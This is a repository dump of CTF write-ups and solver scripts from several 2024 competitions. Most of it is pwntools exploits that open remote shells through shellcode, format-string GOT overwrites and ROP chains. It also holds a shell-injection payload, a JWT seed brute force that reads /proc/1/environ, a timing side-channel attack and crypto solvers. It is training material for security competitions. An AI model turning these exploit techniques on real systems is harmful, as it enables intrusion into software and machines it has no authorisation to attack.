-------------------------------------------------------------------------------- 1 | from pwn import * 2 | import struct 3 | 4 | REMOTE_IP = "158.178.197.18" 5 | REMOTE_PORT = 39909 6 | 7 | p = remote(REMOTE_IP, REMOTE_PORT) 8 | 9 | with open("./shellcode", "rb") as f: 10 | shellcode = f.read() 11 | 12 | p.send(struct.pack('!H', len(shellcode))) 13 | 14 | p.sendline(shellcode) 15 | 16 | p.clean() 17 | 18 | p.interactive() 19 | -------------------------------------------------------------------------------- /2024_03_15_1753CTF/pwn/matrix_preloaded/matrix-preloaded.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_03_15_1753CTF/pwn/matrix_preloaded/matrix-preloaded.zip -------------------------------------------------------------------------------- /2024_03_15_1753CTF/pwn/matrix_preloaded/shellcode: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_03_15_1753CTF/pwn/matrix_preloaded/shellcode -------------------------------------------------------------------------------- /2024_03_15_1753CTF/pwn/matrix_preloaded/shellcode.asm: -------------------------------------------------------------------------------- 1 | ; nasm -felf64 shellcode.asm && ld shellcode.o -o shellcode 2 | 3 | section .text 4 | global _start 5 | 6 | _start: 7 | push rax 8 | xor rdx, rdx 9 | mov rbx, 0x68732f2f6e69622f 10 | push rbx 11 | push rsp 12 | pop rdi 13 | mov al, 59 14 | syscall 15 | -------------------------------------------------------------------------------- /2024_03_15_1753CTF/pwn/write_only/go.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | REMOTE_IP = "147.78.1.47" 4 | REMOTE_PORT = 40183 5 | 6 | p = remote(REMOTE_IP, REMOTE_PORT) 7 | 8 | # mov rdi, 1 9 | # mov rsi, [rbp-0x30] ; flag_mem 10 | # mov rdx, 0x48 11 | # mov rax, 1 12 | # syscall ; write(stdout, flag_mem, 0x48) 13 | shellcode = b"\xbf\x01\x00\00\x00\x48\x8b\x75\xd0\xba\x48\x00\x00\x00\xb8\x01\x00\x00\x00\x0f\x05" 14 | 15 | p.sendline(shellcode) 16 | 17 | p.interactive() 18 | -------------------------------------------------------------------------------- /2024_03_15_1753CTF/pwn/write_only/write-only.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_03_15_1753CTF/pwn/write_only/write-only.zip -------------------------------------------------------------------------------- /2024_03_15_1753CTF/pwn/write_only/write_only.md: -------------------------------------------------------------------------------- 1 | https://ctftime.org/event/2234/ 2 | 3 | # Write Only ~ PWN 4 | 5 | The flag is there. But that doesn’t mean you’ll be able to see it. 6 | 7 | nc 147.78.1.47 40183 8 | 9 | https://dl.1753ctf.com/write-only?s=Fw72X6AX 10 | 11 | ## Solution 12 | 13 | Shellcode that only uses the `write` syscall. 14 | 15 | ``` 16 | from pwn import * 17 | 18 | REMOTE_IP = "147.78.1.47" 19 | REMOTE_PORT = 40183 20 | 21 | p = remote(REMOTE_IP, REMOTE_PORT) 22 | 23 | # mov rdi, 1 24 | # mov rsi, [rbp-0x30] ; flag_mem 25 | # mov rdx, 0x48 26 | # mov rax, 1 27 | # syscall ; write(stdout, flag_mem, 0x48) 28 | shellcode = b"\xbf\x01\x00\00\x00\x48\x8b\x75\xd0\xba\x48\x00\x00\x00\xb8\x01\x00\x00\x00\x0f\x05" 29 | 30 | p.sendline(shellcode) 31 | 32 | p.interactive() 33 | ``` 34 | 35 | ## Flag 36 | `1753c{yes_its_write_only_but_you_can_read_it_too}` 37 | -------------------------------------------------------------------------------- /2024_04_07_TamuCTF24/README.md: -------------------------------------------------------------------------------- 1 | # TAMUCTF 2024 Writeups 2 | 3 | https://ctftime.org/event/2238 4 | 5 | 74th place 2202 points 6 | -------------------------------------------------------------------------------- /2024_04_07_TamuCTF24/cry/criminal/criminal.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_04_07_TamuCTF24/cry/criminal/criminal.zip -------------------------------------------------------------------------------- /2024_04_07_TamuCTF24/pwn/admin_panel/admin-panel.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_04_07_TamuCTF24/pwn/admin_panel/admin-panel.zip -------------------------------------------------------------------------------- /2024_04_07_TamuCTF24/pwn/super_lucky/super-lucky.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_04_07_TamuCTF24/pwn/super_lucky/super-lucky.zip -------------------------------------------------------------------------------- /2024_04_07_TamuCTF24/rev/pwndbg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_04_07_TamuCTF24/rev/pwndbg.png -------------------------------------------------------------------------------- /2024_04_07_TamuCTF24/rev/resistant.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_04_07_TamuCTF24/rev/resistant.zip -------------------------------------------------------------------------------- /2024_05_17_BYUCTF24/README.md: -------------------------------------------------------------------------------- 1 | # BYUCTF 2024 Writeups 2 | 3 | https://ctftime.org/event/2252 4 | 5 | 29th place 6717 points 6 | -------------------------------------------------------------------------------- /2024_05_17_BYUCTF24/cry/are_s_a/cne.txt: -------------------------------------------------------------------------------- 1 | n = 128393532851463575343089974408848099857979358442919384244000744053339479654557691794114605827105884545240515605112453686433508264824840575897640756564360373615937755743038201363814617682765101064651503434978938431452409293245855062934837618374997956788830791719002612108253528457601645424542240025303582528541 2 | e = 65537 3 | c = 93825584976187667358623690800406736193433562907249950376378278056949067505651948206582798483662803340120930066298960547657544217987827103350739742039606274017391266985269135268995550801742990600381727708443998391878164259416326775952210229572031793998878110937636005712923166229535455282012242471666332812788 4 | -------------------------------------------------------------------------------- /2024_05_17_BYUCTF24/cry/times/times.txt: -------------------------------------------------------------------------------- 1 | Curve: y^2 = x**3 + 13x + 245 % 335135809459196851603485825030548860907 2 | Point: (14592775108451646097, 237729200841118959448447480561827799984) 3 | {'ciphertext': b'SllGMo5gxalFG9g8j4KO0cIbXeub0CM2VAWzXo3nbIxMqy1Hl4f+dGwhM9sm793NikYA0EjxvFyRMcU2tKj54Q==', 'iv': b'MWkMvRmhFy2vAO9Be9Depw=='} 4 | -------------------------------------------------------------------------------- /2024_05_17_BYUCTF24/fore/Stardust_Whispers/Stardust_Whispers.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_05_17_BYUCTF24/fore/Stardust_Whispers/Stardust_Whispers.docx -------------------------------------------------------------------------------- /2024_05_17_BYUCTF24/fore/Stardust_Whispers/fun.pcapng: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_05_17_BYUCTF24/fore/Stardust_Whispers/fun.pcapng -------------------------------------------------------------------------------- /2024_05_17_BYUCTF24/pwn/all/all.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_05_17_BYUCTF24/pwn/all/all.zip -------------------------------------------------------------------------------- /2024_05_17_BYUCTF24/pwn/all/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | LOCAL_BINARY = "./src/all" 6 | REMOTE_IP = "all.chal.cyberjousting.com" 7 | REMOTE_PORT = 1348 8 | 9 | #context.log_level = "debug" 10 | elf = ELF(LOCAL_BINARY, checksec=False) 11 | context.binary = elf 12 | 13 | # 67d9e00d38d59674367ca4591666c67e5dfad9e4fdd3861a59d6f26ffea87f65 ./libc.so 14 | # copied from the containerr with $ docker cp id:/lib/x86_64-linux-gnu/libc.so.6 ./libc.so 15 | libc = ELF("./libc.so") 16 | 17 | READ_PLUS_0x17 = 0x1147e2 18 | 19 | #p = elf.process() 20 | #p = elf.debug(gdbscript="b vuln") 21 | p = remote(REMOTE_IP, REMOTE_PORT) 22 | 23 | p.sendline(b"%3$p") 24 | 25 | leak = int(p.readline().decode(), 16) 26 | 27 | libc.address = leak - READ_PLUS_0x17 28 | 29 | log.success(f"libc: 0x{libc.address:x}") 30 | 31 | payload = fmtstr_payload(6, {elf.got["printf"]: libc.sym["system"]}) 32 | 33 | p.sendline(payload) 34 | 35 | p.sendline(b"/bin/sh") 36 | 37 | p.clean() 38 | 39 | p.interactive() 40 | -------------------------------------------------------------------------------- /2024_05_17_BYUCTF24/pwn/numbersss/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:23.04 2 | 3 | # update 4 | RUN apt-get update 5 | RUN apt-get upgrade -y 6 | RUN apt-get install -y xinetd 7 | RUN rm -rf /var/lib/apt/lists/* 8 | 9 | # set up user 10 | RUN mkdir /ctf 11 | RUN useradd -M -d /ctf ctf 12 | 13 | # import files 14 | RUN echo "Connection blocked" > /etc/banner_fail 15 | #COPY ctf.xinetd /etc/xinetd.d/ctf 16 | COPY . /ctf/ 17 | 18 | # set permissions 19 | RUN chown -R root:ctf /ctf 20 | RUN chmod -R 750 /ctf 21 | 22 | # start 23 | CMD ["/usr/sbin/xinetd", "-dontfork"] 24 | EXPOSE 40000 -------------------------------------------------------------------------------- /2024_05_17_BYUCTF24/pwn/numbersss/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | LOCAL_BINARY = "./numbersss" 6 | REMOTE_IP = "numbersss.chal.cyberjousting.com" 7 | REMOTE_PORT = 1351 8 | 9 | elf = ELF(LOCAL_BINARY, checksec=False) 10 | libc = ELF("./remote.libc.so", checksec=False) 11 | context.binary = elf 12 | 13 | p = remote(REMOTE_IP, REMOTE_PORT) 14 | 15 | p.readuntil(b"Free junk: ") 16 | 17 | leak = int(p.readline().decode(), 16) 18 | 19 | libc.address = leak - libc.sym["printf"] 20 | 21 | log.success(f"libc: 0x{libc.address:x}") 22 | 23 | p.readline() 24 | 25 | p.sendline(b"128") 26 | 27 | POP_RDI = 0x240e5 28 | RET = 0x401016 29 | 30 | payload = b"A" * 0x18 31 | payload += p64(libc.address + POP_RDI) 32 | payload += p64(next(libc.search(b"/bin/sh\x00"))) 33 | payload += p64(RET) 34 | payload += p64(libc.sym["system"]) 35 | payload = payload.ljust(128, b"B") 36 | 37 | p.send(payload) 38 | 39 | p.interactive() 40 | -------------------------------------------------------------------------------- /2024_05_17_BYUCTF24/pwn/numbersss/numbersss: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_05_17_BYUCTF24/pwn/numbersss/numbersss -------------------------------------------------------------------------------- /2024_05_17_BYUCTF24/pwn/static/static: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_05_17_BYUCTF24/pwn/static/static -------------------------------------------------------------------------------- /2024_05_17_BYUCTF24/web/not-a-problem/not-a-problem.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_05_17_BYUCTF24/web/not-a-problem/not-a-problem.zip -------------------------------------------------------------------------------- /2024_05_17_BYUCTF24/web/random/writeup.md: -------------------------------------------------------------------------------- 1 | https://ctftime.org/event/2252/ 2 | 3 | # Random (Web) 4 | 5 | DESCRIPTION 6 | I've only had the time to make the API, but it should be working properly. Please make sure it's secure. If you can read any file you want, I'll make sure to reward you! 7 | 8 | ## Solution 9 | The challenge is a Flask server that uses `round(time.time())` as its seed. 10 | So if we can have that we can sign our own jwts. It also gives us a leak of when the server was started: 11 | ```python 12 | except: 13 | abort(Response(f'

NOT AUTHORIZED






This system has been up for {round(time.time()-time_started)} seconds fyi :wink:', status=403)) 14 | ``` 15 | 16 | So we bruteforce the seed with something like this: 17 | ```python 18 | start = get_start() 19 | time_now = rounded(time.time()) 20 | SECRET = hashlib.sha256(str(time_now - start+100-i).encode()).hexdigest() 21 | ``` 22 | 23 | After we have the secret we can get a file read from `/api/file?filename=` 24 | The flag is in a random directory though, so we just read `/proc/1/environ` and get the dir 25 | Then just `/api/file?filename=/random_dir/flag.txt` 26 | 27 | ## Flag 28 | `byuctf{expl01t_chains_involve_multiple_exploits_in_a_row}` 29 | 30 | shafou - 18/05/2024 31 | -------------------------------------------------------------------------------- /2024_05_17_BYUCTF24/web/triple-whammy/triple-whammy.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_05_17_BYUCTF24/web/triple-whammy/triple-whammy.zip -------------------------------------------------------------------------------- /2024_06_08_Akasec24/README.md: -------------------------------------------------------------------------------- 1 | # Akasec CTF 2024 Writeups 2 | 3 | https://ctftime.org/event/2222 4 | 5 | 132nd place 644 points 6 | -------------------------------------------------------------------------------- /2024_06_08_Akasec24/pwn/bad_trip/bad_trip.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_06_08_Akasec24/pwn/bad_trip/bad_trip.zip -------------------------------------------------------------------------------- /2024_06_08_Akasec24/pwn/good_trip/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./good_trip", checksec=False) 7 | context.binary = elf 8 | 9 | #p = elf.process() 10 | #p = elf.debug(gdbscript="b exec") 11 | p = remote("172.210.129.230", 1351) 12 | 13 | payload = b"\x90" * 44 # nops to overwrite 14 | payload += asm("mov rsp, 0x404500") # new stack 15 | payload += asm("mov rdx, 7") 16 | payload += asm("mov rsi, 4096") 17 | payload += asm("movabs rdi, 0x1337131000") 18 | payload += asm("mov rax, 0x00401090") 19 | payload += asm("call rax") # mprotect(0x1337131000, 4096, 7) 20 | payload += asm("mov rdx, 100") 21 | payload += asm("mov rsi, 0x1337131000") 22 | payload += asm("mov rdi, 0") 23 | payload += asm("mov rax, 0x00401060") 24 | payload += asm("call rax") # read(0, 0x1337131000, 100) 25 | payload += asm("movabs rax, 0x1337131000") 26 | payload += asm("jmp rax") # jmp 0x1337131000 27 | 28 | p.readuntil(b"code size >> ") 29 | p.sendline(str(len(payload)).encode()) 30 | 31 | p.readuntil(b"code >> ") 32 | p.sendline(payload) 33 | 34 | p.sendline(asm(shellcraft.sh())) 35 | 36 | p.interactive() 37 | -------------------------------------------------------------------------------- /2024_06_08_Akasec24/pwn/good_trip/good_trip.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_06_08_Akasec24/pwn/good_trip/good_trip.zip -------------------------------------------------------------------------------- /2024_06_08_Akasec24/pwn/warmup/warmup.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_06_08_Akasec24/pwn/warmup/warmup.zip -------------------------------------------------------------------------------- /2024_06_15_jCTF_Teaser24/README.md: -------------------------------------------------------------------------------- 1 | # jCTF Teaser 2024 Writeups 2 | 3 | https://ctftime.org/event/2342 4 | 5 | 106 place 224 points 6 | -------------------------------------------------------------------------------- /2024_06_15_jCTF_Teaser24/pwn/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | from datetime import datetime 5 | 6 | def to_seconds(t): 7 | time_obj = datetime.strptime(t, "%H:%M:%S.%f") 8 | total_seconds = time_obj.hour * 3600 + time_obj.minute * 60 + time_obj.second + time_obj.microsecond / 1e6 9 | return total_seconds 10 | 11 | characters = "_cdhjlnstuw}" + string.digits + "CFT{" 12 | flag = "" # justCTF{s1d3ch4nn3ls_4tw_79828} 13 | 14 | while True: 15 | p = process(["ssh", "-l", "ctf", "-p", "1337", "localhost"], stdin=PTY, stdout=PTY, stderr=PTY) 16 | highest_time = 0 17 | best_char = "\x69" 18 | for char in characters: 19 | new_flag = flag + char 20 | p.readuntil(b"password: ") 21 | p.sendline(new_flag.encode()) 22 | p.readline().decode() 23 | start = to_seconds(p.readline()[13:].decode().split("]")[0]) 24 | stop = to_seconds(p.readline()[13:].decode().split("]")[0]) 25 | diff = stop - start 26 | if diff > highest_time: 27 | highest_time = diff 28 | best_char = char 29 | flag += best_char 30 | log.info(flag) 31 | -------------------------------------------------------------------------------- /2024_06_21_WaniCTF24/README.md: -------------------------------------------------------------------------------- 1 | # Wani CTF 2024 Writeups 2 | 3 | https://ctftime.org/event/2377 4 | 5 | 78 place 2413 points 6 | -------------------------------------------------------------------------------- /2024_06_21_WaniCTF24/crypto/beginners_aes/cry-beginners-aes.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_06_21_WaniCTF24/crypto/beginners_aes/cry-beginners-aes.zip -------------------------------------------------------------------------------- /2024_06_21_WaniCTF24/crypto/beginners_aes/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import hashlib 4 | 5 | from Crypto.Util.Padding import unpad 6 | from Crypto.Cipher import AES 7 | 8 | enc = b'\x16\x97,\xa7\xfb_\xf3\x15.\x87jKRaF&"\xb6\xc4x\xf4.K\xd77j\xe5MLI_y\xd96\xf1$\xc5\xa3\x03\x990Q^\xc0\x17M2\x18' 9 | flag_hash = "6a96111d69e015a07e96dcd141d31e7fc81c4420dbbef75aef5201809093210e" 10 | 11 | def decrypt(key, iv): 12 | cipher = AES.new(key, AES.MODE_CBC, iv) 13 | flag = unpad(cipher.decrypt(enc), 16) 14 | if hashlib.sha256(flag).hexdigest() == flag_hash: 15 | print(flag.decode()) # FLAG{7h3_f1r57_5t3p_t0_Crypt0!!} 16 | 17 | for i in range(0x100): 18 | for j in range(0x100): 19 | key = b'the_enc_key_is_' 20 | iv = b'my_great_iv_is_' 21 | key += i.to_bytes(1, byteorder="big") 22 | iv += j.to_bytes(1, byteorder="big") 23 | try: 24 | decrypt(key, iv) 25 | except: 26 | pass 27 | -------------------------------------------------------------------------------- /2024_06_21_WaniCTF24/crypto/beginners_rsa/cry-beginners-rsa.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_06_21_WaniCTF24/crypto/beginners_rsa/cry-beginners-rsa.zip -------------------------------------------------------------------------------- /2024_06_21_WaniCTF24/crypto/beginners_rsa/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | n = 317903423385943473062528814030345176720578295695512495346444822768171649361480819163749494400347 4 | e = 65537 5 | enc = 127075137729897107295787718796341877071536678034322988535029776806418266591167534816788125330265 6 | 7 | # n is factored with sage 8 | # sage: n = 317903423385943473062528814030345176720578295695512495346444822768171649361480819163749494400347 9 | # sage: n.factor() 10 | # 9953162929836910171 * 11771834931016130837 * 12109985960354612149 * 13079524394617385153 * 17129880600534041513 11 | 12 | p = 9953162929836910171 13 | q = 11771834931016130837 14 | r = 12109985960354612149 15 | s = 13079524394617385153 16 | a = 17129880600534041513 17 | 18 | assert((p*q*r*s*a) == n) 19 | 20 | phi = (p-1)*(q-1)*(r-1)*(s-1)*(a-1) 21 | 22 | d = pow(e, -1, phi) 23 | 24 | m = pow(enc, d, n) 25 | 26 | print(m.to_bytes(20, byteorder="big").decode()) # FLAG{S0_3a5y_1254!!} 27 | -------------------------------------------------------------------------------- /2024_06_21_WaniCTF24/crypto/dance/cry-dance.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_06_21_WaniCTF24/crypto/dance/cry-dance.zip -------------------------------------------------------------------------------- /2024_06_21_WaniCTF24/crypto/replacement/cry-replacement.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_06_21_WaniCTF24/crypto/replacement/cry-replacement.zip -------------------------------------------------------------------------------- /2024_06_21_WaniCTF24/crypto/replacement/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import string 4 | import hashlib 5 | import re 6 | 7 | lookup_table = {} 8 | 9 | for char in string.printable: 10 | h = hashlib.md5(str(ord(char)).encode()).hexdigest() 11 | lookup_table[int(h, 16)] = char 12 | 13 | with open("./my_diary_11_8_Wednesday.txt", "r") as f: 14 | ciphertext = eval(f.read()) 15 | 16 | flag = "" 17 | for char in ciphertext: 18 | flag += lookup_table[char] 19 | 20 | print(re.findall(r'FLAG{.+}', flag)[0]) # FLAG{13epl4cem3nt} 21 | -------------------------------------------------------------------------------- /2024_06_21_WaniCTF24/misc/sh/mis-sh.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_06_21_WaniCTF24/misc/sh/mis-sh.zip -------------------------------------------------------------------------------- /2024_06_21_WaniCTF24/misc/sh/writeup.md: -------------------------------------------------------------------------------- 1 | https://ctftime.org/event/2377 2 | 3 | # sh (misc) 4 | 5 | shellscript without double quotes 6 | 7 | ## Solution 8 | 9 | ```python 10 | from pwn import * 11 | 12 | r = remote("chal-lz56g6.wanictf.org", "7580") 13 | r.sendline(f"0\t|| 1") 14 | r.interactive() 15 | ``` 16 | 17 | - 0 to pass the grep check 18 | - \t to trick printf, not fully sure how it works but i saw in some testcase on busybox 19 | - || 1 to make test always true 20 | 21 | ## Flag 22 | `FLAG{use_she11check_0r_7he_unexpec7ed_h4ppens}` 23 | 24 | shafouz 2024/06/23 25 | -------------------------------------------------------------------------------- /2024_06_21_WaniCTF24/pwn/do_not_rewrite/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./chall", checksec=False) 7 | context.binary = elf 8 | 9 | #p = elf.process() 10 | p = elf.debug(gdbscript="b main") 11 | #p = remote("chal-lz56g6.wanictf.org", 9004) 12 | 13 | p.readuntil(b"hint: show_flag = ") 14 | leak = int(p.readline().decode(), 16) 15 | elf.address = leak - elf.sym["show_flag"] 16 | log.info(f"elf: 0x{elf.address:x}") 17 | 18 | for i in range(3): 19 | p.sendlineafter(b": ", b"A") 20 | p.sendlineafter(b": ", b"1.1") 21 | p.sendlineafter(b": ", b"1.1") 22 | 23 | p.sendlineafter(b": ", p64(elf.sym["show_flag"]+0x17)) 24 | p.sendlineafter(b": ", b"abc") 25 | p.sendlineafter(b": ", b"efg") 26 | 27 | p.interactive() 28 | -------------------------------------------------------------------------------- /2024_06_21_WaniCTF24/pwn/do_not_rewrite/pwn-do-not-rewrite.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_06_21_WaniCTF24/pwn/do_not_rewrite/pwn-do-not-rewrite.zip -------------------------------------------------------------------------------- /2024_06_21_WaniCTF24/pwn/do_not_rewrite2/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | 7 | elf = ELF("./chall", checksec=False) 8 | context.binary = elf 9 | 10 | libc = ELF("./libc.so.6", checksec=False) 11 | 12 | #p = elf.process() 13 | #p = elf.debug(gdbscript="") 14 | p = remote("chal-lz56g6.wanictf.org", 9005) 15 | 16 | p.readuntil(b"hint: printf = ") 17 | leak = int(p.readline().decode(), 16) 18 | libc.address = leak - libc.sym["printf"] 19 | log.info(f"libc: 0x{libc.address:x}") 20 | 21 | for i in range(3): 22 | p.sendlineafter(b": ", b"A") 23 | p.sendlineafter(b": ", b"1.1") 24 | p.sendlineafter(b": ", b"1.1") 25 | 26 | rop = ROP(libc) 27 | rop.rsi = 0 28 | rop.rdi = p64(next(libc.search(b"/bin/sh\x00"))) 29 | rop.rax = constants.SYS_execve 30 | rop.raw(rop.find_gadget(['syscall', 'ret'])[0]) 31 | 32 | p.sendlineafter(b": ", rop.chain()) 33 | p.sendlineafter(b": ", b"abc") 34 | p.sendlineafter(b": ", b"efg") 35 | 36 | p.interactive() 37 | 38 | -------------------------------------------------------------------------------- /2024_06_21_WaniCTF24/pwn/do_not_rewrite2/pwn-do-not-rewrite2.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_06_21_WaniCTF24/pwn/do_not_rewrite2/pwn-do-not-rewrite2.zip -------------------------------------------------------------------------------- /2024_06_21_WaniCTF24/rev/home/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | elf = ELF("./chal_home", checksec=False) 6 | context.binary = elf 7 | 8 | p = elf.debug(gdbscript= 9 | """ 10 | set context-sections '' 11 | break main 12 | continue 13 | nextret 14 | search -t bytes FLAG{ 15 | """) 16 | 17 | p.interactive() # FLAG{How_did_you_get_here_4VKzTLibQmPaBZY4} 18 | -------------------------------------------------------------------------------- /2024_06_21_WaniCTF24/rev/home/rev-home.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_06_21_WaniCTF24/rev/home/rev-home.zip -------------------------------------------------------------------------------- /2024_06_21_WaniCTF24/rev/thread/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | from z3 import * 5 | 6 | N = 45 7 | 8 | output = [ 9 | 0xa8, 0x8a, 0xbf, 0xa5, 0x2fd, 0x59, 0xde, 0x24, 10 | 0x65, 0x10f, 0xde, 0x23, 0x15d, 0x42, 0x2c, 0xde, 11 | 0x09, 0x65, 0xde, 0x51, 0xef, 0x13f, 0x24, 0x53, 12 | 0x15d, 0x48, 0x53, 0xde, 0x09, 0x53, 0x14b, 0x24, 13 | 0x65, 0xde, 0x36, 0x53, 0x15d, 0x12, 0x4a, 0x124, 14 | 0x3f, 0x5f, 0x14e, 0xd5, 0x0b 15 | ] 16 | 17 | input = [] 18 | for i in range(N): 19 | input.append(BitVec(f"{i}", 32)) 20 | 21 | s = Solver() 22 | 23 | for i in range(N): 24 | x = input[i] 25 | op = 0 26 | while op < 3: 27 | new_op = (op + i) % 3 28 | if new_op == 0: 29 | x *= 3 30 | if new_op == 1: 31 | x += 5 32 | if new_op == 2: 33 | x ^= 0x7f 34 | op = op + 1 35 | s.add(x == output[i]) 36 | 37 | s.check() 38 | model = s.model() 39 | 40 | flag = "" 41 | for i in range(len(output)): 42 | flag += chr(int(str(model[input[i]]))) 43 | 44 | print(flag) 45 | 46 | p = process("./thread") 47 | 48 | p.sendline(flag.encode()) 49 | 50 | print(p.readline().decode()) 51 | -------------------------------------------------------------------------------- /2024_06_21_WaniCTF24/rev/thread/rev-thread.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_06_21_WaniCTF24/rev/thread/rev-thread.zip -------------------------------------------------------------------------------- /2024_06_29_UIUCTFCTF24/README.md: -------------------------------------------------------------------------------- 1 | # UIUCTF 2024 Writeups 2 | 3 | https://ctftime.org/event/2275 4 | 5 | 190th place 2023 points 6 | -------------------------------------------------------------------------------- /2024_06_29_UIUCTFCTF24/crypto/without_a_trace/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | traces = [] 6 | 7 | for i in range(6): 8 | with remote("without-a-trace.chal.uiuc.tf", 1337, ssl=True) as p: 9 | if i == 1: 10 | p.sendlineafter(b"u1 = ", b"2") 11 | else: 12 | p.sendlineafter(b"u1 = ", b"1") 13 | 14 | if i == 2: 15 | p.sendlineafter(b"u2 = ", b"2") 16 | else: 17 | p.sendlineafter(b"u2 = ", b"1") 18 | 19 | if i == 3: 20 | p.sendlineafter(b"u3 = ", b"2") 21 | else: 22 | p.sendlineafter(b"u3 = ", b"1") 23 | 24 | if i == 4: 25 | p.sendlineafter(b"u4 = ", b"2") 26 | else: 27 | p.sendlineafter(b"u4 = ", b"1") 28 | 29 | if i == 5: 30 | p.sendlineafter(b"u5 = ", b"2") 31 | else: 32 | p.sendlineafter(b"u5 = ", b"1") 33 | 34 | p.readuntil(b"Have fun: ") 35 | trace = int(p.readline().decode()) 36 | 37 | traces.append(trace) 38 | 39 | flag = b"" 40 | for i in range(5): 41 | flag += (traces[i + 1] - traces[0]).to_bytes(length=5, byteorder="big") 42 | 43 | print(flag.decode()) # uiuctf{tr4c1ng_&&_mult5!} 44 | -------------------------------------------------------------------------------- /2024_06_29_UIUCTFCTF24/crypto/x_marked_the_spot/ct: -------------------------------------------------------------------------------- 1 |  X6S. Z.^; 9^]T6 2 | U5BHPCGK -------------------------------------------------------------------------------- /2024_06_29_UIUCTFCTF24/crypto/x_marked_the_spot/go.py: -------------------------------------------------------------------------------- 1 | import struct 2 | from itertools import cycle 3 | 4 | with open("ct", "rb") as file: 5 | ct = file.read() 6 | 7 | key = b"" 8 | for i, c in enumerate("uiuctf{"): 9 | key += struct.pack("B", ct[i] ^ ord(c)) 10 